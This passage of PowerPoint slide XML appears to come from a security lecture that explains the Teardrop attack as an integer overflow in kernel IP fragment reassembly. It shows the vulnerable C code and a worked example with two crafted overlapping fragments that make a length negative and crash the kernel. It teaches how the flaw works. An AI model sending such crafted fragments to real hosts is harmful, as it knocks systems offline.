              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>qp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;fragments;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>while(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> != NULL) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if(count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 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>skb</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>error_too_big</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;} /* We don’t want a ping of death :) */</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> +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-&gt;offset),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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>,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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>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count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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;next;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>How is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>computed?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2718118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dirty="0"/>
              <a:t>Integer Overflows: Teardrop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Computes the positioning of the fragment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>end = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;offset + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ntohs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</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iph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>tot_len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a: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ihl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If there are overlapping fragments, realigns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>if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 != NULL &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;offset &lt;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-&gt;end) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>overlap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-&gt;end – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;offset; /* size of the overlap */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	offset += overlap; /* increment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> into datagram */</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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> += overlap; /* increment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> into fragment data */ }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Initializes the fragment data structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;offset = offset;</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-&gt;end = end;</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 = end - offset;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If the fragment is smaller than the size of the overlap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>will be bigger than</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>will be negative!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4910336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dirty="0"/>
              <a:t>Integer Overflows: Teardrop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>222.222.222.222 &gt; 128.111.48.50: (frag 242:40@0+)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>222.222.222.222 &gt; 128.111.48.50: (frag 242:8@24)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>offset = 24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>end = 24 + 28 - 20 = 32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;end = 40 &gt; offset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>overlap = 40 - 24 = 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>offset = offset + overlap = 40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = end - offset = 32 - 40 = -8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>will be interpreted as an unsigned value (65528)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Too many bytes will be copied and the kernel will crash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
